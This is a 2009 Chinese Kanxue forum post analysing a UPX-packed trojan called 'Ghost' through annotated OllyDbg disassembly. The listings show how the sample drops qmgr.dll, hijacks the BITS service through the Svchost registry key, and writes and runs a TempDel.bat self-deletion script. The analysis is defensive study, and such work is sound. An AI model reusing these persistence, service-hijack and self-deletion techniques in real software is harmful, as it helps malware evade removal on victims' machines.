【文章标题】: Ghost病毒分析
【文章作者】: 我是土匪
【作者邮箱】: lwzy-crack@163.com
【作者主页】: http://lwzy-crack.blog.163.com
【下载地址】: 已经上传附件。
【加壳方式】: upx
【编写语言】: Microsoft Visual C++ 6.0
【使用工具】: PEID,Ollydbg
【操作平台】: XP sp2
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
--------------------------------------------------------------------------------
【详细过程】
因为我非常菜,错误之处,还望各位给指出,我们好共同进步。谢谢。感谢看雪论坛让我学到了很多书本上学不到的东西。
用PEID查壳,发现时UPX -> www.upx.sourceforge.net *
ESP定律脱壳,这里不赘述了。
到达OEP后:
00401C7E 55 PUSH EBP ; (Initial CPU selection)
00401C7F 8BEC MOV EBP,ESP
00401C81 6A FF PUSH -1
00401C83 68 40214000 PUSH Ghost.00402140
00401C88 68 001E4000 PUSH Ghost.00401E00 ; JMP 到 msvcrt._except_handler3
00401C8D 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
00401C93 50 PUSH EAX
00401C94 64:8925 0000000>MOV DWORD PTR FS:[0],ESP
获取相关函数的地址
00401000 55 PUSH EBP
00401001 8BEC MOV EBP,ESP
00401003 81EC C00B0000 SUB ESP,0BC0
00401009 8365 E4 00 AND DWORD PTR SS:[EBP-1C],0
0040100D 8365 F8 00 AND DWORD PTR SS:[EBP-8],0
00401011 8365 E8 00 AND DWORD PTR SS:[EBP-18],0
00401015 8365 EC 00 AND DWORD PTR SS:[EBP-14],0
00401019 83A5 B4FEFFFF 0>AND DWORD PTR SS:[EBP-14C],0
00401020 8365 F0 00 AND DWORD PTR SS:[EBP-10],0
00401024 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
00401028 8365 E0 00 AND DWORD PTR SS:[EBP-20],0
0040102C FF15 0C214000 CALL DWORD PTR DS:[40210C] ; user32.GetInputState
00401032 6A 00 PUSH 0
00401034 6A 00 PUSH 0
00401036 6A 00 PUSH 0
00401038 FF15 4C204000 CALL DWORD PTR DS:[40204C] ; kernel32.GetCurrentThreadId
0040103E 50 PUSH EAX
0040103F FF15 10214000 CALL DWORD PTR DS:[402110] ; user32.PostThreadMessageA
00401045 6A 00 PUSH 0
00401047 6A 00 PUSH 0
00401049 6A 00 PUSH 0
0040104B 8D45 C4 LEA EAX,DWORD PTR SS:[EBP-3C]
0040104E 50 PUSH EAX
0040104F FF15 14214000 CALL DWORD PTR DS:[402114] ; user32.GetMessageA
00401055 68 E8224000 PUSH Ghost.004022E8 ; shell32.dll
0040105A FF15 AC204000 CALL DWORD PTR DS:[4020AC] ; kernel32.LoadLibraryA
00401060 8985 B4FEFFFF MOV DWORD PTR SS:[EBP-14C],EAX
00401066 68 F4224000 PUSH Ghost.004022F4 ; ShellExecuteA
0040106B FFB5 B4FEFFFF PUSH DWORD PTR SS:[EBP-14C] ; shell32的 hModule
00401071 FF15 A4204000 CALL DWORD PTR DS:[4020A4] ; kernel32.GetProcAddress
00401077 A3 D0314000 MOV DWORD PTR DS:[4031D0],EAX ; 保存 ShellExecuteA 地址
0040107C 68 04234000 PUSH Ghost.00402304 ; Advapi32.dll
00401081 FF15 AC204000 CALL DWORD PTR DS:[4020AC] ; kernel32.LoadLibraryA
00401087 8945 F0 MOV DWORD PTR SS:[EBP-10],EAX
0040108A 68 14234000 PUSH Ghost.00402314 ; OpenSCManagerA
0040108F FF75 F0 PUSH DWORD PTR SS:[EBP-10] ; Advapi32.dll 的 hModule
00401092 FF15 A4204000 CALL DWORD PTR DS:[4020A4] ; kernel32.GetProcAddress
00401098 A3 CC314000 MOV DWORD PTR DS:[4031CC],EAX
0040109D 68 04010000 PUSH 104
004010A2 6A 00 PUSH 0
004010A4 8D85 B8FEFFFF LEA EAX,DWORD PTR SS:[EBP-148]
004010AA 50 PUSH EAX
004010AB E8 C80B0000 CALL Ghost.00401C78 ; JMP 到 msvcrt.memset
004010B0 83C4 0C ADD ESP,0C
004010B3 8D85 B8FEFFFF LEA EAX,DWORD PTR SS:[EBP-148]
004010B9 50 PUSH EAX
004010BA E8 E8080000 CALL Ghost.004019A7 ; CreateEventA
跟进 CALL Ghost.004019A7
-----------------------------------
004019A7 55 PUSH EBP
004019A8 8BEC MOV EBP,ESP
004019AA 83EC 18 SUB ESP,18
004019AD 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
004019B1 FF15 84204000 CALL DWORD PTR DS:[402084] ; kernel32.GetCommandLineA
004019B7 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX
004019BA 6A 20 PUSH 20
004019BC FF75 E8 PUSH DWORD PTR SS:[EBP-18]
004019BF FF15 D0204000 CALL DWORD PTR DS:[4020D0] ; msvcrt.strrchr
004019C5 59 POP ECX
004019C6 59 POP ECX
004019C7 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
004019CA 837D F8 00 CMP DWORD PTR SS:[EBP-8],0
004019CE 74 54 JE SHORT Ghost.00401A24
004019D0 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
004019D3 40 INC EAX
004019D4 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
004019D7 FF75 F8 PUSH DWORD PTR SS:[EBP-8]
004019DA FF15 64204000 CALL DWORD PTR DS:[402064] ; kernel32.lstrlenA
004019E0 8945 F0 MOV DWORD PTR SS:[EBP-10],EAX
004019E3 837D F0 01 CMP DWORD PTR SS:[EBP-10],1
004019E7 7E 0B JLE SHORT Ghost.004019F4
004019E9 837D F0 07 CMP DWORD PTR SS:[EBP-10],7
004019ED 7D 05 JGE SHORT Ghost.004019F4
004019EF E8 1CFFFFFF CALL Ghost.00401910
004019F4 837D F0 06 CMP DWORD PTR SS:[EBP-10],6
004019F8 7E 2A JLE SHORT Ghost.00401A24
004019FA C745 FC 0100000>MOV DWORD PTR SS:[EBP-4],1
00401A01 FF75 F8 PUSH DWORD PTR SS:[EBP-8]
00401A04 FF75 08 PUSH DWORD PTR SS:[EBP+8]
00401A07 FF15 3C204000 CALL DWORD PTR DS:[40203C] ; kernel32.lstrcpyA
00401A0D 68 80000000 PUSH 80
00401A12 FF75 08 PUSH DWORD PTR SS:[EBP+8]
00401A15 FF15 A8204000 CALL DWORD PTR DS:[4020A8] ; kernel32.SetFileAttributesA
00401A1B FF75 08 PUSH DWORD PTR SS:[EBP+8]
00401A1E FF15 40204000 CALL DWORD PTR DS:[402040] ; kernel32.DeleteFileA
-----------------------------------
创建event
00401A28 68 A0244000 PUSH Ghost.004024A0 ; 4F9E860C-9BE9-474b-8FD1-F0EEDB20C77B
00401A2D 6A 00 PUSH 0
00401A2F 6A 01 PUSH 1
00401A31 6A 00 PUSH 0
00401A33 FF15 90204000 CALL DWORD PTR DS:[402090] ; kernel32.CreateEventA
00401A39 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
00401A3C 837D F4 00 CMP DWORD PTR SS:[EBP-C],0
00401A40 74 0D JE SHORT Ghost.00401A4F
00401A42 FF15 9C204000 CALL DWORD PTR DS:[40209C] ; ntdll.RtlGetLastWin32Error
00401A48 3D B7000000 CMP EAX,0B7
00401A4D 75 7A JNZ SHORT Ghost.00401AC9
--------------------------------------------------------------
获得系统目录并建立一个连接到服务控制管理器并打开它的数据库
004010BF 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX
004010C2 68 04010000 PUSH 104
004010C7 6A 00 PUSH 0
004010C9 68 C8304000 PUSH Ghost.004030C8 ; ASCII "C:\WINDOWS\system32"
004010CE E8 A50B0000 CALL Ghost.00401C78 ; JMP 到 msvcrt.memset
004010D3 83C4 0C ADD ESP,0C
004010D6 68 04010000 PUSH 104
004010DB 68 C8304000 PUSH Ghost.004030C8 ; ASCII "C:\WINDOWS\system32"
004010E0 FF15 7C204000 CALL DWORD PTR DS:[40207C] ; kernel32.GetWindowsDirectoryA
004010E6 68 24234000 PUSH Ghost.00402324 ; \system32
004010EB 68 C8304000 PUSH Ghost.004030C8 ; ASCII "C:\WINDOWS\system32"
004010F0 FF15 94204000 CALL DWORD PTR DS:[402094] ; kernel32.lstrcatA
004010F6 68 3F000F00 PUSH 0F003F
004010FB 6A 00 PUSH 0
004010FD 6A 00 PUSH 0
004010FF FF15 CC314000 CALL DWORD PTR DS:[4031CC] ; advapi32.OpenSCManagerA
00401105 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
00401108 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C]
0040110B 50 PUSH EAX
0040110C 6A 01 PUSH 1
0040110E 6A 00 PUSH 0
00401110 68 30234000 PUSH Ghost.00402330 ; SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
00401115 68 02000080 PUSH 80000002
0040111A FF15 0C204000 CALL DWORD PTR DS:[40200C] ; advapi32.RegOpenKeyExA
00401120 68 00040000 PUSH 400
00401125 6A 00 PUSH 0
00401127 8D85 B0FAFFFF LEA EAX,DWORD PTR SS:[EBP-550]
0040112D 50 PUSH EAX
0040112E E8 450B0000 CALL Ghost.00401C78 ; JMP 到 msvcrt.memset
-------------------------------------
释放 qmgr.dll,设置文件属性,和时间 ,替换BITS服务,以服务启动qmgr.dll
004012E5 50 PUSH EAX
004012E6 E8 06030000 CALL Ghost.004015F1 ; 释放 qmgr.dll,设置文件属性,和时间
004012EB 85C0 TEST EAX,EAX
004012ED 75 04 JNZ SHORT Ghost.004012F3 ; 如果成功,就开启服务,否则终止程序
004012EF EB 30 JMP SHORT Ghost.00401321
004012F1 EB 2E JMP SHORT Ghost.00401321
004012F3 6A 00 PUSH 0
004012F5 6A 00 PUSH 0
004012F7 FF75 E0 PUSH DWORD PTR SS:[EBP-20]
004012FA FF15 14204000 CALL DWORD PTR DS:[<&advapi32.StartServi>; advapi32.StartServiceA
00401300 85C0 TEST EAX,EAX
00401302 75 04 JNZ SHORT Ghost.00401308
00401304 EB 1B JMP SHORT Ghost.00401321
00401306 EB 19 JMP SHORT Ghost.00401321
00401308 FF75 E0 PUSH DWORD PTR SS:[EBP-20]
0040130B FF15 28204000 CALL DWORD PTR DS:[<&advapi32.CloseServi>; advapi32.CloseServiceHandle
00401311 FF75 FC PUSH DWORD PTR SS:[EBP-4]
00401314 FF15 28204000 CALL DWORD PTR DS:[<&advapi32.CloseServi>; advapi32.CloseServiceHandle
0040131A 6A 01 PUSH 1
0040131C E8 6E040000 CALL Ghost.0040178F
00401321 FF75 E0 PUSH DWORD PTR SS:[EBP-20]
00401324 FF15 28204000 CALL DWORD PTR DS:[<&advapi32.CloseServi>; advapi32.CloseServiceHandle
--------------------------------------
===========================================================
0040131C E8 6E040000 CALL Ghost.0040178F ; 收尾工作
干完坏事,清理战场。在临时目录生产一个批处理文件“TempDel.bat”,
0040178F 55 PUSH EBP
00401790 8BEC MOV EBP,ESP
00401792 81EC 28070000 SUB ESP,728
00401798 838D ECFEFFFF F>OR DWORD PTR SS:[EBP-114],FFFFFFFF
0040179F 68 04010000 PUSH 104
004017A4 6A 00 PUSH 0
004017A6 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
004017AC 50 PUSH EAX
004017AD E8 C6040000 CALL Ghost.00401C78 ; JMP 到 msvcrt.memset
004017B2 83C4 0C ADD ESP,0C
004017B5 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
004017BB 50 PUSH EAX
004017BC 68 04010000 PUSH 104
004017C1 FF15 44204000 CALL DWORD PTR DS:[402044] ; kernel32.GetTempPathA
004017C7 68 08244000 PUSH Ghost.00402408 ; TempDel.bat
004017CC 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
004017D2 50 PUSH EAX
004017D3 FF15 94204000 CALL DWORD PTR DS:[402094] ; kernel32.lstrcatA
004017D9 68 04010000 PUSH 104
004017DE 6A 00 PUSH 0
004017E0 8D85 D8F8FFFF LEA EAX,DWORD PTR SS:[EBP-728]
004017E6 50 PUSH EAX
004017E7 E8 8C040000 CALL Ghost.00401C78 ; JMP 到 msvcrt.memset
004017EC 83C4 0C ADD ESP,0C
004017EF 68 04010000 PUSH 104
004017F4 8D85 D8F8FFFF LEA EAX,DWORD PTR SS:[EBP-728]
004017FA 50 PUSH EAX
004017FB 6A 00 PUSH 0
004017FD FF15 B0204000 CALL DWORD PTR DS:[4020B0] ; kernel32.GetModuleFileNameA
00401803 68 04010000 PUSH 104
00401808 6A 00 PUSH 0
0040180A 8D85 E0FDFFFF LEA EAX,DWORD PTR SS:[EBP-220]
00401810 50 PUSH EAX
00401811 E8 62040000 CALL Ghost.00401C78 ; JMP 到 msvcrt.memset
00401816 83C4 0C ADD ESP,0C
00401819 837D 08 01 CMP DWORD PTR SS:[EBP+8],1
0040181D 75 1A JNZ SHORT Ghost.00401839
0040181F 68 C8304000 PUSH Ghost.004030C8 ; ASCII "C:\WINDOWS\system32"
00401824 68 14244000 PUSH Ghost.00402414 ; %s\dllcache\lsasvc.dll
00401829 8D85 E0FDFFFF LEA EAX,DWORD PTR SS:[EBP-220]
0040182F 50 PUSH EAX
00401830 FF15 08214000 CALL DWORD PTR DS:[402108] ; user32.wsprintfA
00401836 83C4 0C ADD ESP,0C
00401839 68 00040000 PUSH 400
0040183E 6A 00 PUSH 0
00401840 8D85 E0F9FFFF LEA EAX,DWORD PTR SS:[EBP-620]
00401846 50 PUSH EAX
00401847 E8 2C040000 CALL Ghost.00401C78 ; JMP 到 msvcrt.memset
0040184C 83C4 0C ADD ESP,0C
0040184F 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
00401855 50 PUSH EAX
00401856 8D85 D8F8FFFF LEA EAX,DWORD PTR SS:[EBP-728]
0040185C 50 PUSH EAX
0040185D 8D85 D8F8FFFF LEA EAX,DWORD PTR SS:[EBP-728]
00401863 50 PUSH EAX
00401864 8D85 E0FDFFFF LEA EAX,DWORD PTR SS:[EBP-220]
0040186A 50 PUSH EAX
0040186B 8D85 D8F8FFFF LEA EAX,DWORD PTR SS:[EBP-728]
00401871 50 PUSH EAX
00401872 68 30244000 PUSH Ghost.00402430 ; copy /Y "%s" "%s"\r\n:runagain\r\ndel "%s"\r\nif exist "%s" goto runagain\r\ndel "%s"\r\n
00401877 8D85 E0F9FFFF LEA EAX,DWORD PTR SS:[EBP-620]
0040187D 50 PUSH EAX
0040187E FF15 08214000 CALL DWORD PTR DS:[402108] ; user32.wsprintfA
00401884 83C4 1C ADD ESP,1C
00401887 6A 00 PUSH 0
00401889 68 80000000 PUSH 80
0040188E 6A 02 PUSH 2
00401890 6A 00 PUSH 0
00401892 6A 00 PUSH 0
00401894 68 000000C0 PUSH C0000000
00401899 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
0040189F 50 PUSH EAX
004018A0 FF15 54204000 CALL DWORD PTR DS:[402054] ; kernel32.CreateFileA
004018A6 8985 ECFEFFFF MOV DWORD PTR SS:[EBP-114],EAX
004018AC 83BD ECFEFFFF F>CMP DWORD PTR SS:[EBP-114],-1
004018B3 75 02 JNZ SHORT Ghost.004018B7
004018B5 EB 55 JMP SHORT Ghost.0040190C
004018B7 6A 00 PUSH 0
004018B9 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
004018BC 50 PUSH EAX
004018BD 8D85 E0F9FFFF LEA EAX,DWORD PTR SS:[EBP-620]
004018C3 50 PUSH EAX
004018C4 FF15 64204000 CALL DWORD PTR DS:[402064] ; kernel32.lstrlenA
004018CA 50 PUSH EAX
004018CB 8D85 E0F9FFFF LEA EAX,DWORD PTR SS:[EBP-620]
004018D1 50 PUSH EAX
004018D2 FFB5 ECFEFFFF PUSH DWORD PTR SS:[EBP-114]
004018D8 FF15 80204000 CALL DWORD PTR DS:[402080] ; kernel32.WriteFile
004018DE FFB5 ECFEFFFF PUSH DWORD PTR SS:[EBP-114]
004018E4 FF15 48204000 CALL DWORD PTR DS:[402048] ; kernel32.CloseHandle
004018EA 6A 00 PUSH 0
004018EC 6A 00 PUSH 0
004018EE 6A 00 PUSH 0
004018F0 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
004018F6 50 PUSH EAX
004018F7 68 80244000 PUSH Ghost.00402480 ; open
004018FC 6A 00 PUSH 0
004018FE FF15 D0314000 CALL DWORD PTR DS:[4031D0] ; shell32.ShellExecuteA
00401904 6A 00 PUSH 0
00401906 FF15 50204000 CALL DWORD PTR DS:[402050] ; kernel32.ExitProcess
0040190C C9 LEAVE
0040190D C2 0400 RETN 4
世界杀毒网杀毒结果:http://www.virustotal.com/zh-cn/analisis/947d1ed74bfcf7c253ae99c09cf2afee6c16da34a234f91c6d769199bb3af1aa-1255189745
弱弱的分析了一些,不知道这个东西干嘛了,被好多杀毒软件报毒。麻烦高手给指点一下吧!
--------------------------------------------------------------------------------
【版权声明】: 文章出自看雪论坛,转载请注明作者并保持文章的完整, 谢谢!
2009年10月10日 23:44:23
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课